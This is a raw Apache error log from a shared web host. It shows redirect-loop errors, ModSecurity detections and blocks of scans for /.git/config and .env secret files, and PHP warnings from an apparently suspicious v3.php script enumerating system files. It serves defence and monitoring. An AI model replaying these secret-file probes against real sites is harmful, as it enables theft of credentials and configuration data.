[Mon May 11 18:50:07.566786 2026] [core:error] [pid 1416109:tid 1416146] [client 4.193.137.131:11883] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:07.566821 2026] [core:error] [pid 1416109:tid 1416146] [client 4.193.137.131:11883] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:08.060521 2026] [core:error] [pid 1424905:tid 1424912] [client 4.193.137.131:11874] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:08.060638 2026] [core:error] [pid 1424905:tid 1424912] [client 4.193.137.131:11874] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:08.569224 2026] [core:error] [pid 1412074:tid 1412096] [client 4.193.137.131:11878] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:08.569267 2026] [core:error] [pid 1412074:tid 1412096] [client 4.193.137.131:11878] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:09.068071 2026] [core:error] [pid 1416109:tid 1416144] [client 4.193.137.131:11847] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:09.068219 2026] [core:error] [pid 1416109:tid 1416144] [client 4.193.137.131:11847] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:09.548697 2026] [core:error] [pid 1424905:tid 1424911] [client 4.193.137.131:11842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:09.548721 2026] [core:error] [pid 1424905:tid 1424911] [client 4.193.137.131:11842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:10.034049 2026] [core:error] [pid 1412074:tid 1412089] [client 4.193.137.131:11857] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:10.034191 2026] [core:error] [pid 1412074:tid 1412089] [client 4.193.137.131:11857] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:10.561481 2026] [core:error] [pid 1416109:tid 1416152] [client 4.193.137.131:11864] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:10.561598 2026] [core:error] [pid 1416109:tid 1416152] [client 4.193.137.131:11864] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:11.044893 2026] [core:error] [pid 1424905:tid 1424909] [client 4.193.137.131:11906] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:11.044936 2026] [core:error] [pid 1424905:tid 1424909] [client 4.193.137.131:11906] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:11.545412 2026] [core:error] [pid 1411099:tid 1411108] [client 4.193.137.131:11858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:11.545562 2026] [core:error] [pid 1411099:tid 1411108] [client 4.193.137.131:11858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:12.033791 2026] [core:error] [pid 1412074:tid 1412100] [client 4.193.137.131:11866] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:12.034056 2026] [core:error] [pid 1412074:tid 1412100] [client 4.193.137.131:11866] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:12.553004 2026] [core:error] [pid 1416109:tid 1416150] [client 4.193.137.131:11784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:12.553172 2026] [core:error] [pid 1416109:tid 1416150] [client 4.193.137.131:11784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:13.051755 2026] [core:error] [pid 1424905:tid 1424924] [client 4.193.137.131:11881] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:13.052058 2026] [core:error] [pid 1424905:tid 1424924] [client 4.193.137.131:11881] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:13.600249 2026] [core:error] [pid 1411099:tid 1411103] [client 4.193.137.131:11840] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:13.600395 2026] [core:error] [pid 1411099:tid 1411103] [client 4.193.137.131:11840] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:14.099145 2026] [core:error] [pid 1411055:tid 1411063] [client 4.193.137.131:11885] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:14.099191 2026] [core:error] [pid 1411055:tid 1411063] [client 4.193.137.131:11885] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:14.581834 2026] [core:error] [pid 1416109:tid 1416138] [client 4.193.137.131:11888] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:14.581994 2026] [core:error] [pid 1416109:tid 1416138] [client 4.193.137.131:11888] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:15.091638 2026] [core:error] [pid 1411099:tid 1411102] [client 4.193.137.131:11398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:15.091836 2026] [core:error] [pid 1411099:tid 1411102] [client 4.193.137.131:11398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:17.461820 2026] [core:error] [pid 1411201:tid 1411268] [client 4.193.137.131:11892] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:17.461851 2026] [core:error] [pid 1411201:tid 1411268] [client 4.193.137.131:11892] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:17.940518 2026] [core:error] [pid 1412074:tid 1412085] [client 4.193.137.131:11859] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:17.940551 2026] [core:error] [pid 1412074:tid 1412085] [client 4.193.137.131:11859] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:18.445060 2026] [core:error] [pid 1416109:tid 1416154] [client 4.193.137.131:11867] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:18.445218 2026] [core:error] [pid 1416109:tid 1416154] [client 4.193.137.131:11867] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:18.927526 2026] [core:error] [pid 1411099:tid 1411112] [client 4.193.137.131:11842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:18.927559 2026] [core:error] [pid 1411099:tid 1411112] [client 4.193.137.131:11842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:19.444923 2026] [core:error] [pid 1412074:tid 1412086] [client 4.193.137.131:11886] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:19.444955 2026] [core:error] [pid 1412074:tid 1412086] [client 4.193.137.131:11886] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:19.973508 2026] [core:error] [pid 1411055:tid 1411074] [client 4.193.137.131:11910] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:19.973542 2026] [core:error] [pid 1411055:tid 1411074] [client 4.193.137.131:11910] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:20.452241 2026] [core:error] [pid 1411201:tid 1411267] [client 4.193.137.131:11908] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:20.452274 2026] [core:error] [pid 1411201:tid 1411267] [client 4.193.137.131:11908] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:50:48.778290 2026] [security2:error] [pid 1412074:tid 1412096] [client 43.166.224.244:43698] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agII6DJnyuKVXoStDhbpcgAAAFQ"]
[Mon May 11 18:50:57.646168 2026] [security2:error] [pid 1411055:tid 1411073] [client 43.153.49.151:33778] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/la-fete-est-finie"] [unique_id "agII8UWKUxpmnkK7zHyyeQAAARA"]
[Mon May 11 18:51:04.006628 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 4.193.137.131:9487] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:51:04.313117 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 4.193.137.131:9487] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:51:06.934783 2026] [security2:error] [pid 1411055:tid 1411078] [client 43.153.49.151:39166] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/la-fete-est-finie/"] [unique_id "agII-kWKUxpmnkK7zHyyiAAAARU"], referer: https://www.labaujue.com/la-fete-est-finie
[Mon May 11 18:51:07.164974 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 4.193.137.131:9487] AH01071: Got error 'Primary script unknown'
[Mon May 11 18:51:20.825736 2026] [autoindex:error] [pid 1411201:tid 1411254] [client 194.163.174.253:49800] AH01276: Cannot serve directory /home/ventespr/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Mon May 11 18:51:24.507023 2026] [security2:error] [pid 1416109:tid 1416138] [client 43.134.178.104:52878] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/accueil/"] [unique_id "agIJDFV4kyjgo4bQBUiHMwAAAMg"]
[Mon May 11 18:52:35.573049 2026] [authz_core:error] [pid 1411099:tid 1411120] [client 47.128.23.200:19124] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/Requests/Exception/error_log
[Mon May 11 18:53:04.627377 2026] [security2:error] [pid 1412074:tid 1412090] [client 34.7.47.46:55730] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev3.rentparadise.fr"] [uri "/.git/config"] [unique_id "agIJcDJnyuKVXoStDhbq-wAAAE4"]
[Mon May 11 18:53:04.627724 2026] [security2:error] [pid 1412074:tid 1412090] [client 34.7.47.46:55730] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev3.rentparadise.fr"] [uri "/.git/config"] [unique_id "agIJcDJnyuKVXoStDhbq-wAAAE4"]
[Mon May 11 18:53:05.851410 2026] [security2:error] [pid 1412074:tid 1412090] [client 34.7.47.46:55730] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev3.rentparadise.fr"] [uri "/index.php"] [unique_id "agIJcDJnyuKVXoStDhbq-wAAAE4"]
[Mon May 11 18:53:17.884867 2026] [security2:error] [pid 1416109:tid 1416138] [client 34.71.129.40:33350] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.git/config"] [unique_id "agIJfVV4kyjgo4bQBUiIBwAAAMg"]
[Mon May 11 18:53:17.885032 2026] [security2:error] [pid 1416109:tid 1416138] [client 34.71.129.40:33350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.git/config"] [unique_id "agIJfVV4kyjgo4bQBUiIBwAAAMg"]
[Mon May 11 18:53:18.222751 2026] [security2:error] [pid 1416109:tid 1416138] [client 34.71.129.40:33350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agIJfVV4kyjgo4bQBUiIBwAAAMg"]
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/da/6cda016710e2b26e491ccd3aa95ce2d9d9742c in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/da/6cda016710e2b26e491ccd3aa95ce2d9d9742c in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/da/99d3c3d0d6171f840e14fb6a4f38b490a627de in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/da/99d3c3d0d6171f840e14fb6a4f38b490a627de in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/b6/fd0c69f85dfeba8b71c865f8461d18c165f40f in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/b6/fd0c69f85dfeba8b71c865f8461d18c165f40f in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/82/ff5a67f362d3a1b805710abe4667f3110413ce in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/82/ff5a67f362d3a1b805710abe4667f3110413ce in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/0e/80967c2397a7e7270c7825236b267580ef4646 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/0e/80967c2397a7e7270c7825236b267580ef4646 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/a6/29b5dd6c3ba9cfe32ba6dc96500051d16a9659 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/a6/29b5dd6c3ba9cfe32ba6dc96500051d16a9659 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 18:54:42.043247 2026] [security2:error] [pid 1424905:tid 1424917] [client 5.255.123.95:34712] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.old"] [unique_id "agIJ0oW8yzYoWG_eyCXI5AAAAUk"]
[Mon May 11 18:54:42.043374 2026] [security2:error] [pid 1411201:tid 1411269] [client 5.255.123.95:34768] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/app/.env"] [unique_id "agIJ0vy_GXSWIKeli0sn3wAAAJg"]
[Mon May 11 18:54:42.043546 2026] [security2:error] [pid 1424905:tid 1424917] [client 5.255.123.95:34712] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.old"] [unique_id "agIJ0oW8yzYoWG_eyCXI5AAAAUk"]
[Mon May 11 18:54:42.043577 2026] [security2:error] [pid 1416109:tid 1416147] [client 5.255.123.95:34766] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/backend/.env"] [unique_id "agIJ0lV4kyjgo4bQBUiIpgAAANE"]
[Mon May 11 18:54:42.043642 2026] [security2:error] [pid 1411201:tid 1411269] [client 5.255.123.95:34768] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/app/.env"] [unique_id "agIJ0vy_GXSWIKeli0sn3wAAAJg"]
[Mon May 11 18:54:42.043816 2026] [security2:error] [pid 1416109:tid 1416149] [client 5.255.123.95:34730] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.test"] [unique_id "agIJ0lV4kyjgo4bQBUiIpwAAANM"]
[Mon May 11 18:54:42.043961 2026] [security2:error] [pid 1416109:tid 1416147] [client 5.255.123.95:34766] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/backend/.env"] [unique_id "agIJ0lV4kyjgo4bQBUiIpgAAANE"]
[Mon May 11 18:54:42.043976 2026] [security2:error] [pid 1416109:tid 1416149] [client 5.255.123.95:34730] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.test"] [unique_id "agIJ0lV4kyjgo4bQBUiIpwAAANM"]
